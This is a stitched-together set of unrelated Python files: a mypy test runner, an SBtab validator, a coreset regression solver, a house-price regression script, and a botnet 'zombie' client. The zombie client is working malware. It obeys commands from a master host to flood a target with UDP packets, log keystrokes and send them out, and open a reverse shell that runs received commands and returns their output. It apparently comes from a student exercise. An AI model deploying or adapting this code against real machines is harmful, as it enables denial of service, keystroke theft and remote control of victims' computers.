    if py2:
        mypy_cmdline.append('--py2')
        interpreter = try_find_python2_interpreter()
        if interpreter is None:
            # Skip, can't find a Python 2 interpreter.
            pytest.skip()
            # placate the type checker
            return
    else:
        interpreter = python3_path
        mypy_cmdline.append('--python-version={}'.format('.'.join(map(str, PYTHON3_VERSION))))
    # Write the program to a file.
    program = '_' + testcase.name + '.py'
    program_path = os.path.join(test_temp_dir, program)
    mypy_cmdline.append(program_path)
    with open(program_path, 'w') as file:
        for s in testcase.input:
            file.write('{}\n'.format(s))
    mypy_cmdline.append('--cache-dir={}'.format(cache_dir))
    output = []
    # Type check the program.
    out, err, returncode = api.run(mypy_cmdline)
    # split lines, remove newlines, and remove directory of test case
    for line in (out + err).splitlines():
        if line.startswith(test_temp_dir + os.sep):
            output.append(line[len(test_temp_dir + os.sep):].rstrip("\r\n"))
        else:
            output.append(line.rstrip("\r\n"))
    if returncode == 0:
        # Execute the program only if type checking succeeded.
        returncode, interp_out = run_command([interpreter, program])
        output.extend(interp_out)
    # Remove temp file.
    os.remove(program_path)
    # Compare combined mypy + interpreter output against the expectation.
    assert_string_arrays_equal(adapt_output(testcase), output,
                               'Invalid output ({}, line {})'.format(
                                   testcase.file, testcase.line))
def adapt_output(testcase: DataDrivenTestCase) -> List[str]:
    """Translates the generic _program.py into the actual filename."""
    actual_name = '_' + testcase.name + '.py'
    adapted = []
    for expected_line in testcase.output:
        adapted.append(program_re.sub(actual_name, expected_line))
    return adapted
|
<gh_stars>0
#!/usr/bin/env python
"""
SBtab Validator
===============
Python script that validates SBtab files
See specification for further information.
"""
try:
from . import SBtab
from . import tablibIO
from . import misc
except:
import SBtab
import tablibIO
import misc
import re
import collections
import sys
import os
class SBtabError(Exception):
    '''
    Base class for errors in the SBtab validation class.
    '''
    def __init__(self, message):
        # Keep the description on the instance so __str__ can return it.
        self.message = message

    def __str__(self):
        # The stored description is the full string form of the error.
        return self.message
class ValidateTable:
    '''
    Validator (version 0.9 06/10/2015).
    Checks SBtab file and SBtab object.
    '''
    def __init__(self, sbtab, sbtab_name, def_table=None):
        '''
        Initialises validator and starts check for file and table format.

        Parameters
        ----------
        sbtab: SBtab object
            SBtab data file as SBtab object
        sbtab_name: str
            File path of the SBtab data file
        def_table: SBtab object
            SBtab definition table as SBtab object
        '''
        # initialize warning string
        self.warnings = []
        # define self variables
        self.sbtab = sbtab
        self.filename = sbtab_name
        # read definition table
        self.read_definition(def_table)
        # create set of valid table types
        self.allowed_table_types = list(set([row[2] for row in self.definitions[2:][0]]))
        # create dict of valid column names per table type
        self.allowed_columns = {}
        for table_type in self.allowed_table_types:
            self.allowed_columns[table_type] = [row[0] for row in self.definitions[2:][0] if row[2] == table_type]
        # check file format and header row
        self.check_general_format()
        # map each defined column of this table type to its expected format
        self.column2format = {}
        defs = self.definitions[2]
        for row in defs:
            if row[2] == self.sbtab.table_type:
                self.column2format[row[0]] = row[3]
        # remove empty column headers
        columns = []
        for element in self.sbtab.columns:
            if element == '': pass
            else: columns.append(element)
        self.sbtab.columns = columns
        # check SBtab object for validity
        self.check_table_content()

    def read_definition(self, def_table):
        '''
        read the required definition file; either it is provided by the user
        or the default definition file is read in; otherwise program exit
        '''
        # read in provided definition table or open default
        if def_table:
            try: self.definitions = def_table.sbtab_list
            except:
                print('''Definition file could not be loaded, so the validation
                         could not be started. Please provide definition file
                         as argument''')
                sys.exit()
        else:
            try:
                d = os.path.dirname(os.path.abspath(__file__)) + '/files/default_'\
                    'files/definitions.tsv'
                def_file = open(d, 'r')
                def_table = def_file.read()
                sbtab_def = SBtab.SBtabTable(def_table, d)
                self.definitions = sbtab_def.sbtab_list
            except:
                print('''Definition file could not be loaded, so the validation
                         could not be started. Please provide definition file
                         as argument''')
                sys.exit()

    def check_general_format(self):
        '''
        Validates format of SBtab file, checks file format and header row.
        '''
        header = self.sbtab.header_row
        # Construct consistent quotes to make the header readable
        # NOTE(review): these look like UTF-8 byte sequences written as text
        # escapes (legacy Python 2 style); harmless here, but confirm they
        # still match real smart quotes in Python 3 input.
        quotes = ['"', '\xe2\x80\x9d', '\xe2\x80\x98', '\xe2\x80\x99',
                  '\xe2\x80\x9b', '\xe2\x80\x9c', '\xe2\x80\x9f',
                  '\xe2\x80\xb2', '\xe2\x80\xb3', '\xe2\x80\xb4',
                  '\xe2\x80\xb5', '\xe2\x80\xb6', '\xe2\x80\xb7']
        for quote in quotes:
            try: header = header.replace(quote, "'")
            except: pass
        # check for valid header row
        if not header.startswith('!!'):
            self.warnings.append('''Error: The header row of the table does not
                                    start with "!!SBtab". This file cannot be v
                                    alidated.''')
        if not re.search("TableType='([^']*)'", header):
            self.warnings.append('''Error: The attribute TableType is not defin
                                    ed in the SBtab table; This file cannot be
                                    validated.''')
        if not re.search("TableName='([^']*)'", header):
            self.warnings.append('''Warning: The (optional) attribute TableName
                                    is not defined in the SBtab table.''')
        # check columns for preceding exclamation mark
        for column in self.sbtab.columns:
            if not column.startswith('!') and column != '':
                self.warnings.append('''Warning: Column %s does not start with
                                        an exclamation mark. It will not be processed.''' % (column))
        # check if there are value rows
        # Bugfix: this branch previously re-emitted the exclamation-mark
        # warning above and referenced the leaked loop variable "column"
        # (a NameError when the table has no columns at all); it now reports
        # the actual problem.
        if len(self.sbtab.value_rows) < 1:
            self.warnings.append('''Warning: The SBtab file has no value rows,
                                    so there is no table content that could
                                    be validated.''')
        # check if length of value rows correspond to amount of columns
        for vr in self.sbtab.value_rows:
            if len(vr) != len(self.sbtab.columns):
                self.warnings.append('''Warning: The length of row %s does not
                                        correspond to the amount of columns,
                                        which is %s.''' % (vr, len(self.sbtab.columns)))

    def check_table_content(self):
        '''
        Validates the mandatory format of the SBtab in accordance to the
        TableType attribute.
        '''
        # 1st: check validity of table_type and save table type for later tests
        if self.sbtab.table_type not in self.allowed_table_types:
            self.warnings.append('Warning: The SBtab file has an invalid Tabl'\
                                 'eType in its header: %s. Thus, the validity'\
                                 ' of its columns cannot'\
                                 ' be checked' % (self.sbtab.table_type))
            return
        # 2nd: very important: check if the identifiers start with a digit;
        # this is not allowed in SBML!
        # also check if the identifiers are unique throughout the table
        unique = []
        for row in self.sbtab.value_rows:
            try: identifier = row[self.sbtab.columns_dict['!ID']]
            except: break
            if identifier not in unique: unique.append(identifier)
            else:
                warning = 'Warning: There is an identifier that is not unique'\
                          '. Please change that: %s' % identifier
                self.warnings.append(warning)
            # int() succeeding means the identifier starts with a digit.
            try:
                int(identifier[0])
                self.warnings.append('Warning: There is an identifier that st'\
                                     'arts with a digit; this is not permitte'\
                                     'd for the SBML conversion:'\
                                     '%s' % (identifier))
            except: pass
        # if the SBtab is TableType="Reaction", check if there is at least a
        # SumFormula or an identifier column to characterise the reaction
        if self.sbtab.table_type == 'Reaction':
            if '!ReactionFormula' not in self.sbtab.columns_dict:
                ident = False
                for it in self.sbtab.columns_dict:
                    if it.startswith('!Identifier'):
                        ident = True
                        break
                if not ident:
                    warning = 'Error: A Reaction SBtab needs at least a colum'\
                              'n !ReactionFormula or an !Identifier column to'\
                              'be characterised.'
                    self.warnings.append(warning)
        if self.sbtab.table_type == 'Quantity':
            if '!Unit' not in self.sbtab.columns_dict:
                warning = 'Error: A Quantity SBtab requires the column'\
                          ' "'"Unit"'". Please add this column to the'\
                          ' SBtab file.'
                self.warnings.append(warning)
        # 3rd: check the validity of the given column names
        for column in self.sbtab.columns:
            if column.replace('!', '') not in self.allowed_columns[self.sbtab.table_type] \
               and ('Identifiers:') not in column \
               and ('ID:urn.') not in column:
                self.warnings.append('Warning: The SBtab file has an unknown '\
                                     'column: %s.\nPlease use only supported '\
                                     'column types!' % (column))
        # 4th: check the length of the different rows
        for row in self.sbtab.value_rows:
            # check the rows for entries starting with + or -
            if '!ID' in self.sbtab.columns_dict:
                if str(row[self.sbtab.columns_dict['!ID']]).startswith('+') \
                   or str(row[self.sbtab.columns_dict['!ID']]).startswith('-'):
                    self.warnings.append('Warning: An identifier for a data r'\
                                         'ow must not begin with "+" or "-": '\
                                         '\n%s''' % (row))
            if '!ReactionFormula' in self.sbtab.columns_dict:
                if '<=>' not in row[self.sbtab.columns_dict['!ReactionFormula']]:
                    warning = 'There is a sum formula that does not adhere to'\
                              ' the sum formula syntax from the SBtab specifi'\
                              'cation: %s' % (str(row[self.sbtab.columns_dict['!ReactionFormula']]))
                    self.warnings.append(warning)
            # check each cell value against the expected column format
            for i, entry in enumerate(row):
                if entry == '': continue
                if self.sbtab.columns[i][1:].startswith('Identifier'):
                    req_format = 'string'
                else:
                    try:
                        req_format = self.column2format[self.sbtab.columns[i][1:]]
                    except: continue
                if req_format == 'Boolean':
                    if entry != 'True' and entry != 'False' and entry != 'TRUE' \
                       and entry != 'FALSE' and entry != '0' and entry != '1':
                        warning = 'Warning: The column %s holds a value that '\
                                  'does not conform with the assigned column '\
                                  'format %s: %s' % (self.sbtab.columns[i][1:],
                                                     req_format, entry)
                        self.warnings.append(warning)
                elif req_format == 'float':
                    try: float(entry)
                    except:
                        warning = 'Warning: The column %s holds a value that '\
                                  'does not conform with the assigned column '\
                                  'format %s: %s' % (self.sbtab.columns[i][1:],
                                                     req_format, entry)
                        self.warnings.append(warning)
                elif req_format == '{+,-,0}':
                    if entry != '+' and entry != '-' and entry != '0':
                        warning = 'Warning: The column %s holds a value that '\
                                  'does not conform with the assigned column '\
                                  'format %s: %s' % (self.sbtab.columns[i][1:],
                                                     req_format, entry)
                        self.warnings.append(warning)
        # 5th: are there duplicate columns?
        for column in collections.Counter(self.sbtab.columns).items():
            if column[1] > 1:
                self.warnings.append('''Warning: There was a duplicate column i
                                        n this SBtab file. Please remove it:
                                        %s''' % (str(column[0])))

    def return_output(self):
        '''
        Returns the warnings from the validation process.
        '''
        return self.warnings
if __name__ == '__main__':
    # Command-line entry point: validate an SBtab file (optionally against a
    # definition file) and print any warnings produced by the validators.
    if len(sys.argv) < 2:
        print('You have not provided input arguments. Please start the script '
              'by also providing an SBtab file and the required definition '
              'file: >python validatorSBtab.py SBtab.csv definition.tsv')
        sys.exit()
    file_name = sys.argv[1]
    with open(file_name, 'r') as sbtab_file_o:
        sbtab_file = sbtab_file_o.read()
    delimiter = misc.check_delimiter(sbtab_file)
    sbtab_tablib = tablibIO.importSetNew(sbtab_file, file_name, delimiter)
    # The definition file is optional; fall back to None when it is missing
    # or unreadable (matches the previous best-effort behavior).
    def_tab = None
    if len(sys.argv) > 2:
        try:
            with open(sys.argv[2], 'r') as def_file:
                def_tab = def_file.read()
        except IOError:
            def_tab = None
    validator_output = []
    Validate_file_class = ValidateFile(sbtab_file, file_name)
    validator_output.append(Validate_file_class.return_output())
    Validate_table_class = ValidateTable(sbtab_file, file_name, def_tab)
    validator_output.append(Validate_table_class.return_output())
    # Report all warnings; announce success only when every validator is clean.
    warned = False
    for warning in validator_output:
        if warning != []:
            print('WARNINGS: ', warning)
            warned = True
    if not warned:
        print('The SBtab file is valid.')
|
import sys
import socket
import subprocess
import pyxhook
import time
MASTER_IP = "127.0.0.1"
MASTER_PORT = 6000
ZOMB_PORT = int(sys.argv[1])
log_file='/home/aman/Desktop/file.log'
keys = ""
last_key = ''
#this function is called everytime a key is pressed.
def OnKeyPress(event):
global keys
global last_key
keys += event.Key
keys += " "
last_key = event.Key
class Zombie:
def __init__(self,conn):
self.conn = conn
#Denial of Service Attack
def dos(self,dest_ip,dest_port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #Create socket
print "dos connected..."
except socket.error, msg :
print 'Failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
return
print "starting dos..."
for i in xrange(10):
sock.sendto("ZOMB-("+MASTER_IP+","+str(ZOMB_PORT)+")",(dest_ip,dest_port)) #Send packets
sock.sendto("dos finished...",(MASTER_IP,MASTER_PORT))
sock.close() #Close socket
#Reverse Shell
def reverse_shell(self):
print "Starting reverse shell...\n"
while True:
cmd = self.conn.recv(1024) #Receive shell command
print cmd
if cmd == 'exit': #Break if user wished to exit
print "Exiting...\n"
break
# do shell command
new_process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# read output
stdout_value = new_process.stdout.read() + new_process.stderr.read()
# send back output
self.conn.sendto(stdout_value,(MASTER_IP,MASTER_PORT))
#Keylog for a time period and send data back to master
def keylog(self,t):
global keys
global last_key
keys = ""
last_key = ''
print "initializing keyboard hook..."
#instantiate HookManager class
hook=pyxhook.HookManager()
#listen to all keystrokes
hook.KeyDown=OnKeyPress
#hook the keyboard
hook.HookKeyboard()
#start the session
hook.start()
print "starting key logging..."
start = time.time()
while time.time() - start < t:
if last_key=="grave": #the grave key (`)
break
hook.cancel()
print "stopped key logging..."
keys = keys + "`127.0.0.1`" + str(ZOMB_PORT) #hard coded ip and port
print "sending key data..."
self.conn.sendto(keys,(MASTER_IP,MASTER_PORT))
#Parse masters command
def parse_cmd(self,p):
# packet = conn.recv(1024)
packet = p.split(',')
#packet = "DDOS,DEST_IP,DEST_PORT"
if packet[0] == "DDOS":
self.dos(packet[1],int(packet[2]))
#packet = "KEYL,TIME"
#TIME is in seconds
elif packet[0] == "KEYL":
self.keylog(int(packet[1]))
#packet = "RVSH"
elif packet[0] == "RVSH":
self.conn.sendto("RVSH",(MASTER_IP,MASTER_PORT)) #Tell master to start sending commands
self.reverse_shell()
if __name__ == '__main__':
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #Create socket
s.bind(('',ZOMB_PORT)) #Bind to port
print 'Socket created'
except socket.error, msg :
print 'Failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
zomb = Zombie(s)
while True:
print "\nwaiting for commands..."
#Receive command
data, addr = zomb.conn.recvfrom(1024)
print "reveived: " + data + " from: " + addr[0] + " " + str(addr[1])
if addr[0] == MASTER_IP:
print "Parsing..."
zomb.parse_cmd(data)
zomb.conn.close()
|
"""*****************************************************************************************
MIT License
Copyright (c) 2019 <NAME>, <NAME>, <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
*****************************************************************************************"""
####################################### NOTES ############################################
# - Please cite our paper when using the code:
# "Fast and Accurate Least-Mean-Squares Solvers" (NIPS19' - Oral presentation)
# <NAME> and <NAME> and <NAME>
#
# - Faster algorithm for large values of the dimension d will be published soon.
##########################################################################################
import numpy as np
from sklearn import linear_model
from sklearn.model_selection import KFold
import time
import math
def Caratheodory(P, u, dtype='float64'):
    """
    Implementation of the Caratheodory Theorem (1907).

    Input:  a numpy array P containing n rows (points), each of size d, and a
            positive vector of weights u (that sums to 1).
    Output: a new vector of weights new_u that satisfies:
            1. new_u is non-negative and sums to 1
            2. new_u has at most d+1 non-zero entries
            3. the weighted sum of P with u (input) equals the weighted sum
               of P with new_u (output)
    Computation time: O(n^2 d^2)
    """
    while True:
        n = np.count_nonzero(u)
        d = P.shape[1]
        u_non_zero = np.nonzero(u)
        if n <= d + 1:
            # At most d+1 points already carry weight; nothing left to reduce.
            return u
        A = P[u_non_zero]
        # Translate so the first supported point is the origin; the remaining
        # n-1 columns then span the affine hull of the support.
        reduced_vec = np.outer(A[0], np.ones(A.shape[0] - 1, dtype=dtype))
        A = A[1:].T - reduced_vec
        # A has more columns than rows here, so its null space is non-trivial;
        # the last right-singular vector v satisfies A @ v ~= 0.
        _, _, V = np.linalg.svd(A, full_matrices=True)
        v = V[-1]
        # Prepend the first point's coefficient so that sum(v) == 0, i.e. v is
        # an affine dependence among the supported points.
        v = np.insert(v, [0], -1 * np.sum(v))
        idx_good_alpha = np.nonzero(v > 0)
        # Largest step along v that keeps every weight non-negative.
        alpha = np.min(u[u_non_zero][idx_good_alpha] / v[idx_good_alpha])
        w = np.zeros(u.shape[0], dtype=dtype)
        tmp_w = u[u_non_zero] - alpha * v
        # Force the minimal entry to exactly zero to guard against round-off.
        # (The original code also wrote `w[u_non_zero][argmin] = 0` afterwards,
        # but chained fancy indexing assigns into a temporary copy — it was a
        # no-op and has been removed.)
        tmp_w[np.argmin(tmp_w)] = 0.0
        w[u_non_zero] = tmp_w
        u = w
def Fast_Caratheodory(P,u,coreset_size, dtype = 'float64'):
    """
    Fast and accurate implementation of Caratheodory's theorem.

    Input: a numpy array P containing n rows (points), each of size d, and a
    positive vector of weights u (if u does not sum to 1, it is normalized by
    its sum and the sum is multiplied back into the returned weights).
    Output: a new vector of positive weights new_u that satisfies:
        1. new_u has at most max(coreset_size, d+1) non-zero entries
        2. the weighted sum of P and u (input) equals the weighted sum of
           P and new_u (output)
    Computation time: O(nd + logn * d^4)

    Strategy: split the points into m = 2d+2 equal chunks, run the exact
    (quadratic) Caratheodory on the m chunk means, keep only the chunks that
    survive, and repeat until few enough weights remain.
    """
    d = P.shape[1]
    n = P.shape[0]
    # Number of chunks; 2d+2 guarantees at least half the chunks are dropped
    # per round, giving the logarithmic number of iterations.
    m = 2*d + 2
    if n <= d + 1:
        # Already small enough; nothing to reduce.
        return u.reshape(-1)
    u_sum = np.sum(u)
    # Normalize so the weights form a distribution; restored on return.
    u = u/u_sum
    chunk_size = math.ceil(n/m)
    current_m = math.ceil(n/chunk_size)
    # Zero-pad P and u so n is an exact multiple of chunk_size.
    add_z = chunk_size - int (n%chunk_size)
    u = u.reshape(-1,1)
    if add_z != chunk_size:
        zeros = np.zeros((add_z, P.shape[1]), dtype = dtype)
        P = np.concatenate((P, zeros))
        zeros = np.zeros((add_z, u.shape[1]), dtype = dtype)
        u = np.concatenate((u, zeros))
    # Track original row indices so the final weights can be scattered back.
    idxarray = np.array(range(P.shape[0]) )
    p_groups = P.reshape(current_m, chunk_size, P.shape[1])
    u_groups = u.reshape(current_m, chunk_size)
    idx_group = idxarray.reshape(current_m, chunk_size)
    u_nonzero = np.count_nonzero(u)
    if not coreset_size:
        # Default target: the Caratheodory bound of d+1 points.
        coreset_size = d+1
    while u_nonzero > coreset_size:
        # Weighted mean of each chunk (chunks are weighted uniformly).
        groups_means = np.einsum('ijk,ij->ik',p_groups, u_groups)
        group_weigts = np.ones(groups_means.shape[0], dtype = dtype)*1/current_m
        # Exact Caratheodory on the (few) chunk means selects which chunks
        # survive and with what corrected weight.
        Cara_u_idx = Caratheodory(groups_means , group_weigts,dtype = dtype )
        IDX = np.nonzero(Cara_u_idx)
        new_P = p_groups[IDX].reshape(-1,d)
        # Rescale surviving per-point weights by the chunk's new weight.
        subset_u = (current_m * u_groups[IDX] * Cara_u_idx[IDX][:, np.newaxis]).reshape(-1, 1)
        new_idx_array = idx_group[IDX].reshape(-1,1)
        # Re-chunk the surviving points (with zero padding) for the next round.
        u_nonzero = np.count_nonzero(subset_u)
        chunk_size = math.ceil(new_P.shape[0]/ m)
        current_m = math.ceil(new_P.shape[0]/ chunk_size)
        add_z = chunk_size - int(new_P.shape[0] % chunk_size)
        if add_z != chunk_size:
            new_P = np.concatenate((new_P, np.zeros((add_z, new_P.shape[1]), dtype = dtype)))
            subset_u = np.concatenate((subset_u, np.zeros((add_z, subset_u.shape[1]),dtype = dtype)))
            new_idx_array = np.concatenate((new_idx_array, np.zeros((add_z, new_idx_array.shape[1]),dtype = dtype)))
        p_groups = new_P.reshape(current_m, chunk_size, new_P.shape[1])
        u_groups = subset_u.reshape(current_m, chunk_size)
        idx_group = new_idx_array.reshape(current_m , chunk_size)
    # Scatter the surviving weights back to their original row positions,
    # discarding the padding rows (index >= n), and undo the normalization.
    new_u = np.zeros(n)
    subset_u = subset_u[(new_idx_array < n)]
    new_idx_array = new_idx_array[(new_idx_array < n)].reshape(-1).astype(int)
    new_u[new_idx_array] = subset_u
    return u_sum * new_u
def linregcoreset(P, u, b=None, c_size=None, dtype='float64'):
    """Compute a coreset for weighted linear regression.

    Input: a numpy array P of n rows (points) of size d, a positive weight
    vector u of size n, an optional label column vector b of size n, and an
    optional coreset size c_size.
    Output: (new_P, new_u) — or (new_P, new_u, new_b) when b is given — such
    that for every x:
        ||sqrt(u.T)*(Px-b)||^2 == ||sqrt(new_u.T)*(new_P x - new_b)||^2
    so a linear-regression fit on the coreset equals a fit on the full data.
    Computation time: O(nd^2 + logn * d^8)
    """
    # Work on the augmented matrix [P | b] when labels are supplied.
    augmented = P if b is None else np.append(P, b, axis=1)
    rows = augmented.shape[0]
    cols = augmented.shape[1]
    # Flattened outer product x x^T of every augmented row: preserving the
    # weighted sum of these vectors preserves the regression objective.
    columns = augmented.reshape(rows, cols, 1)
    outer_rows = np.einsum("ikj,ijk->ijk", columns, columns).reshape(rows, -1)
    # Reduce the weights over the outer-product embedding.
    weights = Fast_Caratheodory(outer_rows, u, c_size, dtype=dtype)
    keep = np.nonzero(weights)
    kept_weights = weights[keep].reshape(-1)
    if b is None:
        return P[keep], kept_weights
    return P[keep], kept_weights, b[keep]
def stream_coreset(P, u, b, folds=None, dtype='float64'):
    """Compute a coreset for LMS solvers that use k-fold cross validation.

    Partitions the data into `folds` parts and computes a coreset for each
    part with linregcoreset, zero-padding every per-fold coreset to a common
    size so the folds stay aligned for cross validation.
    Input: a numpy array P of n rows (points) of size d, a positive weight
    vector u of size n, a label vector b of size n, and the number of folds.
    Output: (new_P, new_u, new_b) satisfying, for every x:
        ||sqrt(u.T)*(Px-b)||^2 == ||sqrt(new_u.T)*(new_P x - new_b)||^2
    Computation time: O(nd^2 + logn * d^8)
    """
    def _pad(points, weights, labels, target_rows):
        # Zero-pad one fold's coreset up to target_rows rows so every fold
        # contributes an equally sized chunk. (Zero rows with zero weight do
        # not change the weighted objective.)
        missing = target_rows - points.shape[0]
        if missing <= 0:
            return points, weights, labels
        points = np.concatenate((points, np.zeros((missing, points.shape[1]), dtype=dtype)))
        weights = np.concatenate((weights, np.zeros((missing), dtype=dtype)))
        labels = np.concatenate((labels, np.zeros((missing, labels.shape[1]), dtype=dtype)))
        return points, weights, labels

    if folds is None:
        return linregcoreset(P, u, b, dtype=dtype)
    m = int(P.shape[0] / folds)
    d = P.shape[1]
    # Upper bound on a fold's coreset size: Caratheodory bound (d'+1 with
    # d' = (d+1)^2 for the outer-product embedding of [P | b]).
    size_of_coreset = ((d + 1) * (d + 1) + 1)
    cc, uc, bc = linregcoreset(P[0:m], u[0:m], b[0:m], dtype=dtype)
    cc, uc, bc = _pad(cc, uc, bc, size_of_coreset)
    for batch in range(1, folds):
        coreset, new_u, new_b = linregcoreset(P[batch*m:(batch+1)*m], u[batch*m:(batch+1)*m], b[batch*m:(batch+1)*m], dtype=dtype)
        coreset, new_u, new_b = _pad(coreset, new_u, new_b, size_of_coreset)
        cc = np.concatenate((cc, coreset))
        uc = np.concatenate((uc, new_u))
        bc = np.concatenate((bc, new_b))
    return cc, uc, bc
###################################################################################
# general test whether the fit result match the original problem
def test_model(test_data, test_labels, test_weights, clf):
weighted_test_data = test_data * np.sqrt(test_weights[:, np.newaxis])
weighted_test_labels = test_labels * np.sqrt(test_weights[:, np.newaxis])
score = clf.score(weighted_test_data, weighted_test_labels)
return score
# Train the model on the full (weighted) data set.
def train_model(data, labels, weights, clf):
    # Fit clf on the sqrt-weight-scaled data; return (wall-clock seconds, clf).
    started = time.time()
    scale = np.sqrt(weights[:, np.newaxis])
    clf.fit(data * scale, (labels * scale).ravel())
    return time.time() - started, clf
# K-fold validation to train, using this paper's coreset method
def coreset_train_model(data, labels, weights, clf, folds=None, solver='ridge'):
    """Train clf on a coreset of (data, labels, weights); return (seconds, clf)."""
    started = time.time()
    core_pts, core_w, core_lbl = stream_coreset(data, weights, labels, folds=folds)
    scale = np.sqrt(core_w[:, np.newaxis])
    X = core_pts * scale
    y = (core_lbl * scale).ravel()
    if solver in ['lasso', 'elastic']:
        # Lasso/ElasticNet objectives divide by n_samples, so rescale to keep
        # the effective regularization comparable to a fit on the full data.
        factor = np.sqrt(core_pts.shape[0] / data.shape[0])
        clf.fit(factor * X, factor * y)
    else:
        clf.fit(X, y)
    return time.time() - started, clf
def get_new_clf(solver, folds=3, alphas=100):
    """Build a fresh (cross-validated) linear model for the given solver.

    solver: one of 'linear', 'ridge', 'lasso', 'elastic'.
    folds:  number of cross-validation folds for the CV-based solvers.
    alphas: number of regularization strengths to scan.
    Raises ValueError for an unknown solver name (the previous mixed if/elif
    chain fell through and crashed with UnboundLocalError at `return clf`).
    """
    kf = KFold(n_splits=folds, shuffle=False)
    if "linear" == solver:
        clf = linear_model.LinearRegression(fit_intercept=False)
    elif "ridge" == solver:
        # Scan `alphas` evenly spaced strengths in (0, 10].
        alpha_grid = np.arange(1 / alphas, 10 + 1 / alphas, 10 / alphas)
        clf = linear_model.RidgeCV(alphas=alpha_grid, fit_intercept=False, cv=kf)
    elif "lasso" == solver:
        clf = linear_model.LassoCV(n_alphas=alphas, fit_intercept=False, cv=kf)
    elif "elastic" == solver:
        clf = linear_model.ElasticNetCV(n_alphas=alphas, fit_intercept=False, cv=kf)
    else:
        raise ValueError("unknown solver: %r" % (solver,))
    return clf
def main():
    """Benchmark coreset-based training against full-data training.

    For each solver, fit once on a coreset and once on the full data, then
    report score difference, coefficient difference and the two fit times.
    """
    n, d = 240000, 3
    data_range = 100
    num_of_alphas = 300
    folds = 3
    data = np.floor(np.random.rand(n, d) * data_range)
    labels = np.floor(np.random.rand(n, 1) * data_range)
    weights = np.ones(n)
    for solver in ["lasso", "ridge", "elastic"]:
        # Coreset-based fit.
        clf = get_new_clf(solver, folds=folds, alphas=num_of_alphas)
        time_coreset, clf_coreset = coreset_train_model(data, labels, weights, clf, folds=folds, solver=solver)
        score_coreset = test_model(data, labels, weights, clf)
        # Full-data fit with a fresh estimator.
        clf = get_new_clf(solver, folds=folds, alphas=num_of_alphas)
        time_real, clf_real = train_model(data, labels, weights, clf)
        score_real = test_model(data, labels, weights, clf)
        score_diff = np.abs(score_coreset - score_real)
        coef_diff = np.sum(np.abs(clf_real.coef_ - clf_coreset.coef_))
        print(" solver: {}\n number_of_alphas: {}, \nscore_diff = {}\n---->coef diff = {}\n---->coreset_time = {}\n---->data time = {}".format(
            solver, num_of_alphas, score_diff, coef_diff, time_coreset, time_real))
############################################
if __name__ == '__main__':
main() |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 3 18:44:03 2019
@author: dileepn
Using ScikitLearn for multiple linear regression in order to predict house prices
"""
import numpy as np
from sklearn import linear_model
from sklearn.preprocessing import PolynomialFeatures
from sklearn.metrics.regression import mean_squared_error
import matplotlib.pyplot as plt
# Open the dataset and define X, y, and m
def load_data():
    """Load the regression dataset either from a file or from stdin.

    1. Space-separated text file: first line is "F N" (num. features,
       num. training rows), followed by N rows of "x1 x2 y", then a line
       with T (num. test rows), followed by T rows of "x1 x2".
    2. The same data entered manually (space-separated) on standard input.

    Returns (X, y, X_pred): training features of shape (N, F), training
    labels as a column vector of shape (N, 1), and test features (T, F).
    """
    while True:
        # Prompt user for dataset input type
        input_type = input("Choose dataset input type. 1 (file) or 2 (manual entry): ")
        if input_type == "1":
            filepath = input("Enter the complete filepath (/home/user...): ")
            # Temporary lists to store rows as they are read.
            temp_data = []
            temp_test_data = []
            with open(filepath) as input_file:
                for line_num, line in enumerate(input_file):
                    if line_num == 0:
                        # Header: number of features F and training rows N.
                        F, N = map(int, line.split())
                    elif line_num == N + 1:
                        # Separator line: number of test rows T.
                        T = int(line)
                    elif 0 < line_num <= N:
                        x1, x2, y = line.split()
                        temp_data += [(float(x1), float(x2), float(y))]
                    elif N + 1 < line_num <= N + T + 1:
                        x1, x2 = line.split()
                        temp_test_data += [(float(x1), float(x2))]
            dataset = np.array(temp_data)
            X_pred = np.array(temp_test_data)
            X = dataset[:, :F]
            y = dataset[:, F].reshape(-1, 1)
            break
        elif input_type == "2":
            # First line has number of features and number of training examples.
            F, N = map(int, input().split())
            train = np.array([input().split() for _ in range(N)], dtype=np.float64)
            T = int(input())
            X_pred = np.array([input().split() for _ in range(T)], dtype=np.float64)
            X = train[:, :F]
            # Reshape to a column vector for consistency with the file branch
            # (previously this branch returned y as a 1-D array).
            y = train[:, F].reshape(-1, 1)
            break
        else:
            print("Incorrect input. Please enter 1 or 2.")
    return (X, y, X_pred)
# Load data interactively (file path or manual entry).
X_train, y_train, X_test = load_data()
# Fit the model
model = linear_model.LinearRegression()
#%% Linear regression
model.fit(X_train, y_train)
# Make predictions
y_pred = model.predict(X_test)
# Error metrics
# NOTE(review): y_test is a hard-coded expected-label vector for exactly four
# test points — this breaks for any other T; confirm the intended dataset.
y_test = np.array([105.22, 142.68, 132.94, 129.71])
mse = mean_squared_error(y_test, y_pred)
print("MSE = {:.2f}".format(mse))
#%% Now with polynomial features (degree-3 expansion of the inputs)
poly = PolynomialFeatures(degree = 3)
X_poly = poly.fit_transform(X_train)
# NOTE(review): transform() (not fit_transform) is the conventional call on
# test data; for PolynomialFeatures the output is the same — confirm intent.
X_test_poly = poly.fit_transform(X_test)
model.fit(X_poly, y_train)
